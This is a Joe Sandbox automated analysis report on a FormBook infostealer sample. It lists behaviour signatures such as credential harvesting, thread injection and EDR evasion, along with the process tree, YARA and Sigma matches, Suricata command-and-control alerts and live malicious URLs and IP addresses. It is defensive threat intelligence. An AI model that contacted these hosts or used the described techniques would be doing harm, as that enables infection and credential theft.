Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1SxKeB4u0c.exe

Overview

General Information

Sample name:1SxKeB4u0c.exe
renamed because original name is a hash value
Original sample name:00bbacda5ecf2d79323ffbc8da4cec8894f657b1208c959d6c7af4c4e0a63539.exe
Analysis ID:1588634
MD5:897ff2a936f11b8f74f56e0c835a2c43
SHA1:9d55cead9cdcd487df37b4264f4a2483f19c8184
SHA256:00bbacda5ecf2d79323ffbc8da4cec8894f657b1208c959d6c7af4c4e0a63539
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 1SxKeB4u0c.exe (PID: 2160 cmdline: "C:\Users\user\Desktop\1SxKeB4u0c.exe" MD5: 897FF2A936F11B8F74F56E0C835A2C43)
    • svchost.exe (PID: 3272 cmdline: "C:\Users\user\Desktop\1SxKeB4u0c.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • LbtMpScwNRqrVB.exe (PID: 5840 cmdline: "C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • bitsadmin.exe (PID: 6524 cmdline: "C:\Windows\SysWOW64\bitsadmin.exe" MD5: F57A03FA0E654B393BB078D1C60695F3)
          • LbtMpScwNRqrVB.exe (PID: 5960 cmdline: "C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2684 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • armsvc.exe (PID: 2508 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: C14356FC1BFD5700FA1D54D53D65507C)
  • alg.exe (PID: 1848 cmdline: C:\Windows\System32\alg.exe MD5: 212514466AE3CEB072CE28C89C73B2D2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1682840085.0000000000ED0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.3894297177.0000000003260000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3897117965.0000000003740000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000008.00000002.3900036415.0000000005260000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000007.00000002.3897375687.0000000003790000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.svchost.exe.420000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.svchost.exe.420000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious Process Parents
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe" , CommandLine: "C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe, NewProcessName: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe, OriginalFileName: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe, ParentCommandLine: "C:\Windows\SysWOW64\bitsadmin.exe", ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 6524, ParentProcessName: bitsadmin.exe, ProcessCommandLine: "C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe" , ProcessId: 5960, ProcessName: LbtMpScwNRqrVB.exe
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\1SxKeB4u0c.exe", CommandLine: "C:\Users\user\Desktop\1SxKeB4u0c.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\1SxKeB4u0c.exe", ParentImage: C:\Users\user\Desktop\1SxKeB4u0c.exe, ParentProcessId: 2160, ParentProcessName: 1SxKeB4u0c.exe, ProcessCommandLine: "C:\Users\user\Desktop\1SxKeB4u0c.exe", ProcessId: 3272, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\1SxKeB4u0c.exe", CommandLine: "C:\Users\user\Desktop\1SxKeB4u0c.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\1SxKeB4u0c.exe", ParentImage: C:\Users\user\Desktop\1SxKeB4u0c.exe, ParentProcessId: 2160, ParentProcessName: 1SxKeB4u0c.exe, ProcessCommandLine: "C:\Users\user\Desktop\1SxKeB4u0c.exe", ProcessId: 3272, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T03:29:38.153479+010020507451Malware Command and Control Activity Detected192.168.2.849711161.97.142.14480TCP
                2025-01-11T03:30:02.244910+010020507451Malware Command and Control Activity Detected192.168.2.84971623.225.160.13280TCP
                2025-01-11T03:30:36.774129+010020507451Malware Command and Control Activity Detected192.168.2.849720149.88.81.19080TCP
                2025-01-11T03:31:50.256479+010020507451Malware Command and Control Activity Detected192.168.2.84972685.159.66.9380TCP
                2025-01-11T03:32:03.584409+010020507451Malware Command and Control Activity Detected192.168.2.849730185.27.134.14480TCP
                2025-01-11T03:32:17.220453+010020507451Malware Command and Control Activity Detected192.168.2.849734104.21.95.16080TCP
                2025-01-11T03:32:30.684068+010020507451Malware Command and Control Activity Detected192.168.2.849738188.114.97.380TCP
                2025-01-11T03:32:44.250506+010020507451Malware Command and Control Activity Detected192.168.2.849742154.88.22.10180TCP
                2025-01-11T03:32:57.547399+010020507451Malware Command and Control Activity Detected192.168.2.849746209.74.77.10780TCP
                2025-01-11T03:33:19.491866+010020507451Malware Command and Control Activity Detected192.168.2.849750104.21.48.180TCP
                2025-01-11T03:33:35.521212+010020507451Malware Command and Control Activity Detected192.168.2.84975420.2.249.780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T03:29:01.710695+010020181411A Network Trojan was detected54.244.188.17780192.168.2.849705TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T03:29:01.710695+010020377711A Network Trojan was detected54.244.188.17780192.168.2.849705TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T03:29:38.153479+010028554651A Network Trojan was detected192.168.2.849711161.97.142.14480TCP
                2025-01-11T03:30:02.244910+010028554651A Network Trojan was detected192.168.2.84971623.225.160.13280TCP
                2025-01-11T03:30:36.774129+010028554651A Network Trojan was detected192.168.2.849720149.88.81.19080TCP
                2025-01-11T03:31:50.256479+010028554651A Network Trojan was detected192.168.2.84972685.159.66.9380TCP
                2025-01-11T03:32:03.584409+010028554651A Network Trojan was detected192.168.2.849730185.27.134.14480TCP
                2025-01-11T03:32:17.220453+010028554651A Network Trojan was detected192.168.2.849734104.21.95.16080TCP
                2025-01-11T03:32:30.684068+010028554651A Network Trojan was detected192.168.2.849738188.114.97.380TCP
                2025-01-11T03:32:44.250506+010028554651A Network Trojan was detected192.168.2.849742154.88.22.10180TCP
                2025-01-11T03:32:57.547399+010028554651A Network Trojan was detected192.168.2.849746209.74.77.10780TCP
                2025-01-11T03:33:19.491866+010028554651A Network Trojan was detected192.168.2.849750104.21.48.180TCP
                2025-01-11T03:33:35.521212+010028554651A Network Trojan was detected192.168.2.84975420.2.249.780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T03:29:54.604282+010028554641A Network Trojan was detected192.168.2.84971323.225.160.13280TCP
                2025-01-11T03:29:57.198005+010028554641A Network Trojan was detected192.168.2.84971423.225.160.13280TCP
                2025-01-11T03:29:59.729424+010028554641A Network Trojan was detected192.168.2.84971523.225.160.13280TCP
                2025-01-11T03:30:09.276305+010028554641A Network Trojan was detected192.168.2.849717149.88.81.19080TCP
                2025-01-11T03:30:11.823282+010028554641A Network Trojan was detected192.168.2.849718149.88.81.19080TCP
                2025-01-11T03:30:14.370041+010028554641A Network Trojan was detected192.168.2.849719149.88.81.19080TCP
                2025-01-11T03:30:43.409205+010028554641A Network Trojan was detected192.168.2.84972385.159.66.9380TCP
                2025-01-11T03:30:45.950346+010028554641A Network Trojan was detected192.168.2.84972485.159.66.9380TCP
                2025-01-11T03:30:48.520763+010028554641A Network Trojan was detected192.168.2.84972585.159.66.9380TCP
                2025-01-11T03:31:55.939008+010028554641A Network Trojan was detected192.168.2.849727185.27.134.14480TCP
                2025-01-11T03:31:58.520385+010028554641A Network Trojan was detected192.168.2.849728185.27.134.14480TCP
                2025-01-11T03:32:01.061440+010028554641A Network Trojan was detected192.168.2.849729185.27.134.14480TCP
                2025-01-11T03:32:09.561620+010028554641A Network Trojan was detected192.168.2.849731104.21.95.16080TCP
                2025-01-11T03:32:12.141540+010028554641A Network Trojan was detected192.168.2.849732104.21.95.16080TCP
                2025-01-11T03:32:14.684573+010028554641A Network Trojan was detected192.168.2.849733104.21.95.16080TCP
                2025-01-11T03:32:23.035066+010028554641A Network Trojan was detected192.168.2.849735188.114.97.380TCP
                2025-01-11T03:32:25.594023+010028554641A Network Trojan was detected192.168.2.849736188.114.97.380TCP
                2025-01-11T03:32:28.125662+010028554641A Network Trojan was detected192.168.2.849737188.114.97.380TCP
                2025-01-11T03:32:36.631692+010028554641A Network Trojan was detected192.168.2.849739154.88.22.10180TCP
                2025-01-11T03:32:39.172598+010028554641A Network Trojan was detected192.168.2.849740154.88.22.10180TCP
                2025-01-11T03:32:41.713395+010028554641A Network Trojan was detected192.168.2.849741154.88.22.10180TCP
                2025-01-11T03:32:49.867503+010028554641A Network Trojan was detected192.168.2.849743209.74.77.10780TCP
                2025-01-11T03:32:52.445463+010028554641A Network Trojan was detected192.168.2.849744209.74.77.10780TCP
                2025-01-11T03:32:55.026836+010028554641A Network Trojan was detected192.168.2.849745209.74.77.10780TCP
                2025-01-11T03:33:11.862420+010028554641A Network Trojan was detected192.168.2.849747104.21.48.180TCP
                2025-01-11T03:33:14.400430+010028554641A Network Trojan was detected192.168.2.849748104.21.48.180TCP
                2025-01-11T03:33:16.953921+010028554641A Network Trojan was detected192.168.2.849749104.21.48.180TCP
                2025-01-11T03:33:27.895923+010028554641A Network Trojan was detected192.168.2.84975120.2.249.780TCP
                2025-01-11T03:33:30.440328+010028554641A Network Trojan was detected192.168.2.84975220.2.249.780TCP
                2025-01-11T03:33:32.975054+010028554641A Network Trojan was detected192.168.2.84975320.2.249.780TCP
                2025-01-11T03:33:41.767203+010028554641A Network Trojan was detected192.168.2.849755156.251.17.22480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T03:29:02.139160+010028508511Malware Command and Control Activity Detected192.168.2.84970618.141.10.10780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: 1SxKeB4u0c.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://54.244.188.177/UAvira URL Cloud: Label: malware
                Source: http://www.amayavp.xyz/d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2Avira URL Cloud: Label: malware
                Source: http://www.soainsaat.xyz/rum2/Avira URL Cloud: Label: malware
                Source: http://54.244.188.177/LAvira URL Cloud: Label: malware
                Source: http://www.amayavp.xyz/d9ku/?jNn=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K9aiv+zbDkEKhMSDsVMvwPhhINhuEU9ODct9Lj1wj6urmQ==&3P=ZxaxIFQAvira URL Cloud: Label: malware
                Source: http://www.amayavp.xyz/d9ku/Avira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Windows\System32\AppVClient.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Windows\System32\alg.exeAvira: detection malicious, Label: W32/Infector.Gen
                Multi AV Scanner detection for submitted file
                Source: 1SxKeB4u0c.exeReversingLabs: Detection: 86%
                Source: 1SxKeB4u0c.exeVirustotal: Detection: 83%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.svchost.exe.420000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.420000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1682840085.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3894297177.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3897117965.0000000003740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3900036415.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3897375687.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1678896334.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3897666427.0000000002B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1683604299.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                Source: C:\Windows\System32\AppVClient.exeJoe Sandbox ML: detected
                Source: C:\Windows\System32\alg.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: 1SxKeB4u0c.exeJoe Sandbox ML: detected
                Source: 1SxKeB4u0c.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: 1SxKeB4u0c.exe, 00000000.00000003.1432232486.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
                Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
                Source: Binary string: ALG.pdbGCTL source: 1SxKeB4u0c.exe, 00000000.00000003.1437010006.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000003.00000003.1647360528.0000000000848000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1647240452.000000000081A000.00000004.00000020.00020000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000002.3895903417.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000003.00000003.1647360528.0000000000848000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1647240452.000000000081A000.00000004.00000020.00020000.00000000.sdmp, LbtMpScwNRqrVB.exe, 00000006.00000002.3895903417.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LbtMpScwNRqrVB.exe, 00000006.00000002.3894269356.000000000013E000.00000002.00000001.01000000.00000005.sdmp, LbtMpScwNRqrVB.exe, 00000008.00000000.1750220082.000000000013E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 1SxKeB4u0c.exe, 00000000.00000003.1452279000.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000003.1441801356.0000000004250000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1682889494.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1682889494.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1586104823.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1583925733.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.1684871418.00000000037BB000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3897569853.0000000003B0E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.1682483471.000000000360E000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3897569853.0000000003970000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 1SxKeB4u0c.exe, 00000000.00000003.1452279000.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, 1SxKeB4u0c.exe, 00000000.00000003.1441801356.0000000004250000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.1682889494.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1682889494.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1586104823.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1583925733.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, bitsadmin.exe, 00000007.00000003.1684871418.00000000037BB000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3897569853.0000000003B0E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.1682483471.000000000360E000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3897569853.0000000003970000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: ALG.pdb source: 1SxKeB4u0c.exe, 00000000.00000003.1437010006.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr

                Spreading

                barindex
                Infects executable files (exe, dll, sys, html)
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
                Source: C:\Users\user\Desktop\1SxKeB4u0c.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 7_2_0327C640 FindFirstFileW,FindNextFileW,FindClose,7_2_0327C640
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4x nop then xor eax, eax7_2_03269E80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4x nop then mov ebx, 00000004h7_2_038804FE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:49706 -> 18.141.10.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49736 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49739 -> 154.88.22.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49753 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49733 -> 104.21.95.160:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49746 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49746 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49730 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49716 -> 23.225.160.132:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49725 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49730 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49716 -> 23.225.160.132:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49751 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49755 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49720 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49720 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49729 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49738 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49738 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49748 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49724 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49715 -> 23.225.160.132:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49745 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49718 -> 149.88.81.190:80
